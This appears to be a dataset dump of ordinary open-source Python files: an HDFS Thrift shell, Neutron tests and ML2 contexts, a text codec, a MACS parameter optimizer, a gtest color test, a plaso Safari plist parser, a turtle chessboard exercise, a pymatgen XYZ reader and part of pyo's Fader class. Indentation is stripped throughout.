if (len(params) != 2):
print " ERROR usage: chmod 774 <pathname>\n"
return 0
perm = params[0].strip()
name = params[1].strip()
if name == "":
print " ERROR usage: chmod 774 <pathname>\n"
return 0
if perm == "":
print " ERROR usage: chmod 774 <pathname>\n"
return 0
# set permissions (in octal)
path = Pathname();
path.pathname = name;
status = self.client.chmod(path, int(perm,8))
return 0
#############################
# Set owner for a file. This is not an atomic operation.
# A change to the group of a file may be overwritten by this one.
#############################
def do_chown(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: chown <ownername> <pathname>\n"
return 0
owner = params[0].strip()
name = params[1].strip()
if name == "":
print " ERROR usage: chown <ownername> <pathname>\n"
return 0
# get the current owner and group
path = Pathname();
path.pathname = name;
cur = self.client.stat(path)
# set new owner, keep old group
status = self.client.chown(path, owner, cur.group)
return 0
#######################################
# Set the replication factor for a file
######################################
def do_setreplication(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: setreplication <replication factor> <pathname>\n"
return 0
repl = params[0].strip()
name = params[1].strip()
if name == "":
print " ERROR usage: setreplication <replication factor> <pathname>\n"
return 0
if repl == "":
print " ERROR usage: setreplication <replication factor> <pathname>\n"
return 0
path = Pathname();
path.pathname = name;
status = self.client.setReplication(path, int(repl))
return 0
#############################
# Display the locations of the blocks of this file
#############################
def do_getlocations(self, name):
if name == "":
print " ERROR usage: getlocations <pathname>\n"
return 0
path = Pathname();
path.pathname = name;
# find size of hdfs file
filesize = self.client.stat(path).length
# getlocations file
blockLocations = self.client.getFileBlockLocations(path, 0, filesize)
for item in blockLocations:
self.printLocations(item)
return 0
#############################
# Utility methods from here
#############################
#
# If I don't do this, the last command is always re-executed which is annoying.
#
def emptyline(self):
pass
#
# print the status of a path
#
def printStatus(self, stat):
print str(stat.block_replication) + "\t" + str(stat.length) + "\t" + str(stat.modification_time) + "\t" + stat.permission + "\t" + stat.owner + "\t" + stat.group + "\t" + stat.path
#
# print the locations of a block
#
def printLocations(self, location):
print str(location.names) + "\t" + str(location.offset) + "\t" + str(location.length)
#
# Various ways to exit the hdfs shell
#
def do_quit(self,ignored):
try:
if startServer:
self.client.shutdown(1)
return -1
except Exception, ex:
return -1
def do_q(self,ignored):
return self.do_quit(ignored)
# ctl-d
def do_EOF(self,ignored):
return self.do_quit(ignored)
#
# Give the user some amount of help - I am a nice guy
#
def help_create(self):
print "create <pathname>"
def help_rm(self):
print "rm <pathname>"
def help_mv(self):
print "mv <srcpathname> <destpathname>"
def help_mkdirs(self):
print "mkdirs <pathname>"
def help_exists(self):
print "exists <pathname>"
def help_put(self):
print "put <localpathname> <hdfspathname>"
def help_get(self):
print "get <hdfspathname> <localpathname>"
def help_ls(self):
print "ls <hdfspathname>"
def help_chmod(self):
print "chmod 775 <hdfspathname>"
def help_chown(self):
print "chown <ownername> <hdfspathname>"
def help_setreplication(self):
print "setrep <replication factor> <hdfspathname>"
def help_getlocations(self):
print "getlocations <pathname>"
def help_EOF(self):
print '<ctl-d> will quit this program.'
def help_quit(self):
print 'if you need to know what quit does, you shouldn\'t be using a computer.'
def help_q(self):
print 'quit and if you need to know what quit does, you shouldn\'t be using a computer.'
def help_help(self):
print 'duh'
def usage(exec_name):
print "Usage: "
print " %s [proxyclientname [proxyclientport]]" % exec_name
print " %s -v" % exec_name
print " %s --help" % exec_name
print " %s -h" % exec_name
if __name__ == "__main__":
#
# Rudimentary command line processing.
#
# real parsing:
parser = OptionParser()
parser.add_option("-e", "--execute", dest="command_str",
help="execute this command and exit")
parser.add_option("-s","--proxyclient",dest="host",help="the proxyclient's hostname")
parser.add_option("-p","--port",dest="port",help="the proxyclient's port number")
(options, args) = parser.parse_args()
#
# Save host and port information of the proxy server
#
if (options.host):
host = options.host
startServer = False
if (options.port):
port = options.port
startServer = False
#
# Retrieve the user's readline history.
#
historyFileName = os.path.expanduser("~/.hdfs_history")
if (os.path.exists(historyFileName)):
readline.read_history_file(historyFileName)
#
# Create class and connect to proxy server
#
c = hadoopthrift_cli(host,port)
if startServer:
if c.startProxyServer() == False:
sys.exit(1)
if c.connect() == False:
sys.exit(1)
#
# If this utility was invoked with one argument, process it
#
if (options.command_str):
c.onecmd(options.command_str)
sys.exit(0)
#
# Start looping over user commands.
#
c.cmdloop('Welcome to the Thrift interactive shell for Hadoop File System. - how can I help you? ' + '\n'
'Press tab twice to see the list of commands. ' + '\n' +
'To complete the name of a command press tab once. \n'
)
c.shutdown();
readline.write_history_file(historyFileName)
print '' # I am nothing if not courteous.
sys.exit(0)
| apache-2.0 |
gopal1cloud/neutron | neutron/tests/unit/test_common_log.py | 22 | 2943 | # Copyright (c) 2013 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron.common import log as call_log
from neutron.tests import base
MODULE_NAME = 'neutron.tests.unit.test_common_log'
class TargetKlass(object):
@call_log.log
def test_method(self, arg1, arg2, *args, **kwargs):
pass
class TestCallLog(base.BaseTestCase):
def setUp(self):
super(TestCallLog, self).setUp()
self.klass = TargetKlass()
self.expected_format = ('%(class_name)s method %(method_name)s '
'called with arguments %(args)s %(kwargs)s')
self.expected_data = {'class_name': MODULE_NAME + '.TargetKlass',
'method_name': 'test_method',
'args': (),
'kwargs': {}}
def test_call_log_all_args(self):
self.expected_data['args'] = (10, 20)
with mock.patch.object(call_log.LOG, 'debug') as log_debug:
self.klass.test_method(10, 20)
log_debug.assert_called_once_with(self.expected_format,
self.expected_data)
def test_call_log_all_kwargs(self):
self.expected_data['kwargs'] = {'arg1': 10, 'arg2': 20}
with mock.patch.object(call_log.LOG, 'debug') as log_debug:
self.klass.test_method(arg1=10, arg2=20)
log_debug.assert_called_once_with(self.expected_format,
self.expected_data)
def test_call_log_known_args_unknown_args_kwargs(self):
self.expected_data['args'] = (10, 20, 30)
self.expected_data['kwargs'] = {'arg4': 40}
with mock.patch.object(call_log.LOG, 'debug') as log_debug:
self.klass.test_method(10, 20, 30, arg4=40)
log_debug.assert_called_once_with(self.expected_format,
self.expected_data)
def test_call_log_known_args_kwargs_unknown_kwargs(self):
self.expected_data['args'] = (10,)
self.expected_data['kwargs'] = {'arg2': 20, 'arg3': 30, 'arg4': 40}
with mock.patch.object(call_log.LOG, 'debug') as log_debug:
self.klass.test_method(10, arg2=20, arg3=30, arg4=40)
log_debug.assert_called_once_with(self.expected_format,
self.expected_data)
| apache-2.0 |
lucafavatella/intellij-community | python/lib/Lib/encodings/utf_16_be.py | 860 | 1037 | """ Python 'utf-16-be' Codec
Written by Marc-Andre Lemburg ([email protected]).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""
import codecs
### Codec APIs
encode = codecs.utf_16_be_encode
def decode(input, errors='strict'):
return codecs.utf_16_be_decode(input, errors, True)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.utf_16_be_encode(input, self.errors)[0]
class IncrementalDecoder(codecs.BufferedIncrementalDecoder):
_buffer_decode = codecs.utf_16_be_decode
class StreamWriter(codecs.StreamWriter):
encode = codecs.utf_16_be_encode
class StreamReader(codecs.StreamReader):
decode = codecs.utf_16_be_decode
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='utf-16-be',
encode=encode,
decode=decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
| apache-2.0 |
odb9402/OPPA | oppa/macs/archive.py | 1 | 5675 | """
this module is actual fix some parameter by using
bayesian optimization. if we run this function in parallel,
we need to satisfied many condition which mentioned in the paper
named 'practical bayesian optimization in machine learning algorithm'
"""
from math import exp
import subprocess
import time
from multiprocessing import cpu_count
from multiprocessing import Process
from ..optimizeHyper import run as optimizeHyper
from ..calculateError import run as calculateError
from ..loadParser.loadLabel import run as loadLabel
from ..loadParser.parseLabel import run as parseLabel
def learnMACSparam(args, test_set, validation_set, PATH):
"""
this function actually control learning steps. args is given by
oppa.py ( main function of this program ) from command line.
and make wrapper_function to use BayesianOptimization library,
only wrapper_function`s arguments will be learned by library.
:param args:
argument from command lines
:param test_set:
python list of test set
:param validation_set:
python list of validation set
:return: learned parameter.
"""
input_file = args.input
control = args.control
call_type = args.callType
def wrapper_narrow_cut(opt_Qval):
correct = run(input_file, validation_set, str(exp(opt_Qval/100)-1), call_type, control)
print "Qval :"+str(exp(opt_Qval/100)-1)
return correct
def wrapper_broad_cut(opt_Qval, opt_cutoff):
correct = run(input_file, validation_set, str(exp(opt_Qval/100)-1), call_type, control, broad=str(exp(opt_cutoff/100)-1))
print "Qval :"+str(exp(opt_Qval/100)-1), "Broad-cutoff:"+str(exp(opt_cutoff/100)-1)
return correct
parameters_bounds_narrow = {'opt_Qval':(10**-8,60.0)}
parameters_bounds_broad = {'opt_Qval':(10**-8,60.0),\
'opt_cutoff':(10**-7,60.0)}
number_of_init_sample = 2
if call_type is None:
result = optimizeHyper(wrapper_narrow_cut, parameters_bounds_narrow, number_of_init_sample)
subprocess.call(['macs2','callpeak','-t',input_file,'-c',control,'-g','hs','-q',str(result['max_params']['opt_Qval'])])
print " final error about test set is :::" + str(final_error)
else:
result = optimizeHyper(wrapper_broad_cut, parameters_bounds_broad, number_of_init_sample)
def run(input_file, valid_set, Qval, call_type, control = None, broad=None):
"""
this function run MACS and calculate error at once.
each arguments will be given by learnMACSparam that from command line.
:param input_file:
input file name.
:param valid_set:
python list of labeled data
:param Qval:
Q-value of MACS. it will be learned.
:param control:
control bam file in MACS. not necessary.
:return:
error rate of between MACS_output and labeled Data.
"""
import MACS
chromosome_list = []
for label in valid_set:
chromosome_list.append(label.split(':')[0])
chromosome_list = list(set(chromosome_list))
reference_char = ".REF_"
bam_name = input_file[:-4] ## delete '.bam'
if control is not None:
cr_bam_name = control[:-4]
MAX_CORE = cpu_count()
TASKS = len(chromosome_list)
TASK_NO = 0
macs_processes = []
while (len(macs_processes) < MAX_CORE-1) and (TASK_NO < TASKS):
if control is not None:
macs_processes.append(MACS.run(bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", Qval, call_type, cr_bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", broad))
else:
macs_processes.append(MACS.run(bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", Qval, call_type, broad=broad))
TASK_NO += 1
while len(macs_processes) > 0:
time.sleep(0.1)
for proc in reversed(range(len(macs_processes))):
if macs_processes[proc].poll() is not None:
del macs_processes[proc]
while (len(macs_processes) < MAX_CORE - 1) and (TASK_NO < TASKS):
if control is not None:
macs_processes.append(MACS.run(bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", Qval, call_type, cr_bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", broad))
else:
macs_processes.append(MACS.run(bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", Qval, call_type, broad=broad))
TASK_NO += 1
#there must be valid validation set and test set.
if not valid_set:
print "there are no matched validation set :p\n"
exit()
#actual learning part
else:
error_num, label_num = summerize_error(bam_name, valid_set, call_type)
if label_num is 0:
return 1.0
return (1 - error_num/label_num) * 100
def summerize_error(bam_name, validation_set, call_type):
"""
:param bam_name:
:param validation_set:
:return:
"""
sum_error_num = 0
sum_label_num = 0
reference_char = ".REF_chr"
if call_type == "broad":
output_format_name = '.broadPeak'
else:
output_format_name = '.narrowPeak'
for chr_no in range(22):
input_name = bam_name + reference_char + str(chr_no+1) + ".bam_peaks" + output_format_name
error_num, label_num = calculateError(input_name, parseLabel(validation_set, input_name))
sum_error_num += error_num
sum_label_num += label_num
# add about sexual chromosome
input_name = bam_name + reference_char + 'X' + ".bam_peaks" + output_format_name
error_num, label_num = calculateError(input_name, parseLabel(validation_set, input_name))
sum_error_num += error_num
sum_label_num += label_num
input_name = bam_name + reference_char + 'Y' + ".bam_peaks" + output_format_name
error_num, label_num = calculateError(input_name, parseLabel(validation_set, input_name))
sum_error_num += error_num
sum_label_num += label_num
return sum_error_num , sum_label_num
| mit |
charlescearl/VirtualMesos | third_party/libprocess/third_party/gmock-1.6.0/gtest/test/gtest_color_test.py | 3259 | 4911 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Verifies that Google Test correctly determines whether to use colors."""
__author__ = '[email protected] (Zhanyong Wan)'
import os
import gtest_test_utils
IS_WINDOWS = os.name = 'nt'
COLOR_ENV_VAR = 'GTEST_COLOR'
COLOR_FLAG = 'gtest_color'
COMMAND = gtest_test_utils.GetTestExecutablePath('gtest_color_test_')
def SetEnvVar(env_var, value):
"""Sets the env variable to 'value'; unsets it when 'value' is None."""
if value is not None:
os.environ[env_var] = value
elif env_var in os.environ:
del os.environ[env_var]
def UsesColor(term, color_env_var, color_flag):
"""Runs gtest_color_test_ and returns its exit code."""
SetEnvVar('TERM', term)
SetEnvVar(COLOR_ENV_VAR, color_env_var)
if color_flag is None:
args = []
else:
args = ['--%s=%s' % (COLOR_FLAG, color_flag)]
p = gtest_test_utils.Subprocess([COMMAND] + args)
return not p.exited or p.exit_code
class GTestColorTest(gtest_test_utils.TestCase):
def testNoEnvVarNoFlag(self):
"""Tests the case when there's neither GTEST_COLOR nor --gtest_color."""
if not IS_WINDOWS:
self.assert_(not UsesColor('dumb', None, None))
self.assert_(not UsesColor('emacs', None, None))
self.assert_(not UsesColor('xterm-mono', None, None))
self.assert_(not UsesColor('unknown', None, None))
self.assert_(not UsesColor(None, None, None))
self.assert_(UsesColor('linux', None, None))
self.assert_(UsesColor('cygwin', None, None))
self.assert_(UsesColor('xterm', None, None))
self.assert_(UsesColor('xterm-color', None, None))
self.assert_(UsesColor('xterm-256color', None, None))
def testFlagOnly(self):
"""Tests the case when there's --gtest_color but not GTEST_COLOR."""
self.assert_(not UsesColor('dumb', None, 'no'))
self.assert_(not UsesColor('xterm-color', None, 'no'))
if not IS_WINDOWS:
self.assert_(not UsesColor('emacs', None, 'auto'))
self.assert_(UsesColor('xterm', None, 'auto'))
self.assert_(UsesColor('dumb', None, 'yes'))
self.assert_(UsesColor('xterm', None, 'yes'))
def testEnvVarOnly(self):
"""Tests the case when there's GTEST_COLOR but not --gtest_color."""
self.assert_(not UsesColor('dumb', 'no', None))
self.assert_(not UsesColor('xterm-color', 'no', None))
if not IS_WINDOWS:
self.assert_(not UsesColor('dumb', 'auto', None))
self.assert_(UsesColor('xterm-color', 'auto', None))
self.assert_(UsesColor('dumb', 'yes', None))
self.assert_(UsesColor('xterm-color', 'yes', None))
def testEnvVarAndFlag(self):
"""Tests the case when there are both GTEST_COLOR and --gtest_color."""
self.assert_(not UsesColor('xterm-color', 'no', 'no'))
self.assert_(UsesColor('dumb', 'no', 'yes'))
self.assert_(UsesColor('xterm-color', 'no', 'auto'))
def testAliasesOfYesAndNo(self):
"""Tests using aliases in specifying --gtest_color."""
self.assert_(UsesColor('dumb', None, 'true'))
self.assert_(UsesColor('dumb', None, 'YES'))
self.assert_(UsesColor('dumb', None, 'T'))
self.assert_(UsesColor('dumb', None, '1'))
self.assert_(not UsesColor('xterm', None, 'f'))
self.assert_(not UsesColor('xterm', None, 'false'))
self.assert_(not UsesColor('xterm', None, '0'))
self.assert_(not UsesColor('xterm', None, 'unknown'))
if __name__ == '__main__':
gtest_test_utils.Main()
| apache-2.0 |
joachimmetz/plaso | plaso/parsers/plist_plugins/safari.py | 2 | 3592 | # -*- coding: utf-8 -*-
"""Plist parser plugin for Safari history plist files."""
from dfdatetime import cocoa_time as dfdatetime_cocoa_time
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.parsers import plist
from plaso.parsers.plist_plugins import interface
class SafariHistoryEventData(events.EventData):
"""Safari history event data.
Attributes:
display_title (str): display title of the webpage visited.
title (str): title of the webpage visited.
url (str): URL visited.
visit_count (int): number of times the website was visited.
was_http_non_get (bool): True if the webpage was visited using a non-GET
HTTP request.
"""
DATA_TYPE = 'safari:history:visit'
def __init__(self):
"""Initializes event data."""
super(SafariHistoryEventData, self).__init__(data_type=self.DATA_TYPE)
self.display_title = None
self.title = None
self.url = None
self.visit_count = None
self.was_http_non_get = None
class SafariHistoryPlugin(interface.PlistPlugin):
"""Plist parser plugin for Safari history plist files."""
NAME = 'safari_history'
DATA_FORMAT = 'Safari history plist file'
PLIST_PATH_FILTERS = frozenset([
interface.PlistPathFilter('History.plist')])
PLIST_KEYS = frozenset(['WebHistoryDates', 'WebHistoryFileVersion'])
# pylint: disable=arguments-differ
def _ParsePlist(self, parser_mediator, match=None, **unused_kwargs):
"""Extracts Safari history items.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
match (Optional[dict[str: object]]): keys extracted from PLIST_KEYS.
"""
format_version = match.get('WebHistoryFileVersion', None)
if format_version != 1:
parser_mediator.ProduceExtractionWarning(
'unsupported Safari history version: {0!s}'.format(format_version))
return
if 'WebHistoryDates' not in match:
return
for history_entry in match.get('WebHistoryDates', {}):
last_visited_date = history_entry.get('lastVisitedDate', None)
if last_visited_date is None:
parser_mediator.ProduceExtractionWarning('missing last visited date')
continue
try:
# Last visited date is a string containing a floating point value.
timestamp = float(last_visited_date)
except (TypeError, ValueError):
parser_mediator.ProduceExtractionWarning(
'unable to convert last visited date {0:s}'.format(
last_visited_date))
continue
display_title = history_entry.get('displayTitle', None)
event_data = SafariHistoryEventData()
if display_title != event_data.title:
event_data.display_title = display_title
event_data.title = history_entry.get('title', None)
event_data.url = history_entry.get('', None)
event_data.visit_count = history_entry.get('visitCount', None)
event_data.was_http_non_get = history_entry.get(
'lastVisitWasHTTPNonGet', None)
# Convert the floating point value to an integer.
# TODO: add support for the fractional part of the floating point value.
timestamp = int(timestamp)
date_time = dfdatetime_cocoa_time.CocoaTime(timestamp=timestamp)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_LAST_VISITED)
parser_mediator.ProduceEventWithEventData(event, event_data)
plist.PlistParser.RegisterPlugin(SafariHistoryPlugin)
| apache-2.0 |
Valka7a/python-playground | python-course-softuni/introduction-python3/lecture-one-excercises/ex7.py | 1 | 1947 | import turtle
# Get user's input
board_size = input('Enter bord size: ')
# Validate user's input
try:
board_size = int(board_size)
if board_size < 8:
raise Exception('Board size cannot be less then 8.')
except ValueError:
print('Invalid input!')
exit()
except Exception as error:
print(error)
exit()
# Configure turtle's color based on current row and col
def configure_turtle_color(row, col):
if row % 2 == 1:
col += 1
if col % 2 == 0:
turtle.color('black')
return
turtle.color('white')
# Draw single square with the size provided
def draw_square(size, fill=True):
if fill:
turtle.begin_fill()
for _ in range(4):
turtle.forward(size)
turtle.left(90)
if fill:
turtle.end_fill()
# Draw borders around the board,
# so it can be seen properly with
# any background color
def draw_board_borders():
turtle.penup()
turtle.color('black')
turtle.goto(-1, -1)
turtle.pendown()
draw_square(board_size + 2, False)
turtle.penup()
turtle.color('white')
turtle.goto(-2, -2)
turtle.pendown()
draw_square(board_size + 4, False)
# Draw the chess board
def draw_chess_board():
item_length = board_size / 8
row = x_coord = y_coord = 0
for number in range(1, 65):
configure_turtle_color(row, number)
turtle.penup()
turtle.goto(x_coord, y_coord)
turtle.pendown()
draw_square(item_length)
x_coord += item_length
if number % 8 == 0:
row += 1
x_coord = 0
y_coord += item_length
draw_board_borders()
# Configure the turtle
turtle.speed('fastest')
turtle.bgcolor('brown')
# Draw
draw_chess_board()
# Move the turtle to the side,
# so the chessboard is seen
# better when it's with smaller size
turtle.penup()
turtle.goto(-10, -10)
# Wait for user's click to exit
turtle.exitonclick() | mit |
subramani95/neutron | neutron/plugins/ml2/driver_context.py | 6 | 4610 | # Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.openstack.common import jsonutils
from neutron.plugins.ml2 import db
from neutron.plugins.ml2 import driver_api as api
class MechanismDriverContext(object):
"""MechanismDriver context base class."""
def __init__(self, plugin, plugin_context):
self._plugin = plugin
# This temporarily creates a reference loop, but the
# lifetime of PortContext is limited to a single
# method call of the plugin.
self._plugin_context = plugin_context
class NetworkContext(MechanismDriverContext, api.NetworkContext):
def __init__(self, plugin, plugin_context, network,
original_network=None):
super(NetworkContext, self).__init__(plugin, plugin_context)
self._network = network
self._original_network = original_network
self._segments = db.get_network_segments(plugin_context.session,
network['id'])
@property
def current(self):
return self._network
@property
def original(self):
return self._original_network
@property
def network_segments(self):
return self._segments
class SubnetContext(MechanismDriverContext, api.SubnetContext):
def __init__(self, plugin, plugin_context, subnet, original_subnet=None):
super(SubnetContext, self).__init__(plugin, plugin_context)
self._subnet = subnet
self._original_subnet = original_subnet
@property
def current(self):
return self._subnet
@property
def original(self):
return self._original_subnet
class PortContext(MechanismDriverContext, api.PortContext):
def __init__(self, plugin, plugin_context, port, network,
original_port=None):
super(PortContext, self).__init__(plugin, plugin_context)
self._port = port
self._original_port = original_port
self._network_context = NetworkContext(plugin, plugin_context,
network)
self._binding = db.ensure_port_binding(plugin_context.session,
port['id'])
if original_port:
self._original_bound_segment_id = self._binding.segment
self._original_bound_driver = self._binding.driver
else:
self._original_bound_segment_id = None
self._original_bound_driver = None
self._new_port_status = None
@property
def current(self):
return self._port
@property
def original(self):
return self._original_port
@property
def network(self):
return self._network_context
@property
def bound_segment(self):
id = self._binding.segment
if id:
for segment in self._network_context.network_segments:
if segment[api.ID] == id:
return segment
@property
def original_bound_segment(self):
if self._original_bound_segment_id:
for segment in self._network_context.network_segments:
if segment[api.ID] == self._original_bound_segment_id:
return segment
@property
def bound_driver(self):
return self._binding.driver
@property
def original_bound_driver(self):
return self._original_bound_driver
def host_agents(self, agent_type):
return self._plugin.get_agents(self._plugin_context,
filters={'agent_type': [agent_type],
'host': [self._binding.host]})
def set_binding(self, segment_id, vif_type, vif_details,
status=None):
# TODO(rkukura) Verify binding allowed, segment in network
self._binding.segment = segment_id
self._binding.vif_type = vif_type
self._binding.vif_details = jsonutils.dumps(vif_details)
self._new_port_status = status
| apache-2.0 |
montoyjh/pymatgen | pymatgen/io/xyz.py | 5 | 4144 | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import re
from pymatgen.core.structure import Molecule
from monty.io import zopen
"""
Module implementing an XYZ file object class.
"""
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "[email protected]"
__date__ = "Apr 17, 2012"
class XYZ:
"""
Basic class for importing and exporting Molecules or Structures in XYZ
format.
Args:
mol: Input molecule or list of molecules
.. note::
Exporting periodic structures in the XYZ format will lose information
about the periodicity. Essentially, only cartesian coordinates are
written in this format and no information is retained about the
lattice.
"""
def __init__(self, mol, coord_precision=6):
if isinstance(mol, Molecule) or not isinstance(mol, list):
self._mols = [mol]
else:
self._mols = mol
self.precision = coord_precision
@property
def molecule(self):
"""
Returns molecule associated with this XYZ. In case multiple frame
XYZ, returns the last frame.
"""
return self._mols[-1]
@property
def all_molecules(self):
"""
Returns all the frames of molecule associated with this XYZ.
"""
return self._mols
@staticmethod
def _from_frame_string(contents):
"""
Convert a single frame XYZ string to a molecule
"""
lines = contents.split("\n")
num_sites = int(lines[0])
coords = []
sp = []
coord_patt = re.compile(
r"(\w+)\s+([0-9\-\+\.eEdD]+)\s+([0-9\-\+\.eEdD]+)\s+([0-9\-\+\.eEdD]+)"
)
for i in range(2, 2 + num_sites):
m = coord_patt.search(lines[i])
if m:
sp.append(m.group(1)) # this is 1-indexed
# this is 0-indexed
# in case of 0.0D+00 or 0.00d+01 old double precision writing
# replace d or D by e for ten power exponent
xyz = [val.lower().replace("d", "e") for val in m.groups()[1:4]]
coords.append([float(val) for val in xyz])
return Molecule(sp, coords)
@staticmethod
def from_string(contents):
"""
Creates XYZ object from a string.
Args:
contents: String representing an XYZ file.
Returns:
XYZ object
"""
if contents[-1] != "\n":
contents += "\n"
white_space = r"[ \t\r\f\v]"
natoms_line = white_space + r"*\d+" + white_space + r"*\n"
comment_line = r"[^\n]*\n"
coord_lines = r"(\s*\w+\s+[0-9\-\+\.eEdD]+\s+[0-9\-\+\.eEdD]+\s+[0-9\-\+\.eEdD]+\s*\n)+"
frame_pattern_text = natoms_line + comment_line + coord_lines
pat = re.compile(frame_pattern_text, re.MULTILINE)
mols = []
for xyz_match in pat.finditer(contents):
xyz_text = xyz_match.group(0)
mols.append(XYZ._from_frame_string(xyz_text))
return XYZ(mols)
@staticmethod
def from_file(filename):
"""
Creates XYZ object from a file.
Args:
filename: XYZ filename
Returns:
XYZ object
"""
with zopen(filename) as f:
return XYZ.from_string(f.read())
def _frame_str(self, frame_mol):
output = [str(len(frame_mol)), frame_mol.composition.formula]
fmtstr = "{{}} {{:.{0}f}} {{:.{0}f}} {{:.{0}f}}".format(self.precision)
for site in frame_mol:
output.append(fmtstr.format(site.specie, site.x, site.y, site.z))
return "\n".join(output)
def __str__(self):
return "\n".join([self._frame_str(mol) for mol in self._mols])
def write_file(self, filename):
"""
Writes XYZ to file.
Args:
filename: File name of output file.
"""
with zopen(filename, "wt") as f:
f.write(self.__str__())
| mit |
jpippy/pyo | pyolib/controls.py | 5 | 24741 | """
Objects designed to create parameter's control at audio rate.
These objects can be used to create envelopes, line segments
and conversion from python number to audio signal.
The audio streams of these objects can't be sent to the output
soundcard.
"""
"""
Copyright 2009-2015 Olivier Belanger
This file is part of pyo, a python module to help digital signal
processing script creation.
pyo is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
pyo is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with pyo. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
from _core import *
from _maps import *
from _widgets import createGraphWindow
from types import ListType, TupleType
######################################################################
### Controls
######################################################################
class Fader(PyoObject):
"""
Fadein - fadeout envelope generator.
Generate an amplitude envelope between 0 and 1 with control on fade
times and total duration of the envelope.
The play() method starts the envelope and is not called at the
object creation time.
:Parent: :py:class:`PyoObject`
:Args:
fadein : float, optional
Rising time of the envelope in seconds. Defaults to 0.01.
fadeout : float, optional
Falling time of the envelope in seconds. Defaults to 0.1.
dur : float, optional
Total duration of the envelope. Defaults to 0, which means wait
for the stop() method to start the fadeout.
.. note::
The out() method is bypassed. Fader's signal can not be sent to audio outs.
The play() method starts the envelope.
The stop() calls the envelope's release phase if `dur` = 0.
>>> s = Server().boot()
>>> s.start()
>>> f = Fader(fadein=0.5, fadeout=0.5, dur=2, mul=.5)
>>> a = BrownNoise(mul=f).mix(2).out()
>>> def repeat():
... f.play()
>>> pat = Pattern(function=repeat, time=2).play()
"""
def __init__(self, fadein=0.01, fadeout=0.1, dur=0, mul=1, add=0):
pyoArgsAssert(self, "nnnOO", fadein, fadeout, dur, mul, add)
PyoObject.__init__(self, mul, add)
self._fadein = fadein
self._fadeout = fadeout
self._dur = dur
fadein, fadeout, dur, mul, add, lmax = convertArgsToLists(fadein, fadeout, dur, mul, add)
self._base_objs = [Fader_base(wrap(fadein,i), wrap(fadeout,i), wrap(dur,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def out(self, chnl=0, inc=1, dur=0, delay=0):
return self.play(dur, delay)
def setFadein(self, x):
"""
Replace the `fadein` attribute.
:Args:
x : float
new `fadein` attribute.
"""
pyoArgsAssert(self, "n", x)
self._fadein = x
x, lmax = convertArgsToLists(x)
[obj.setFadein(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setFadeout(self, x):
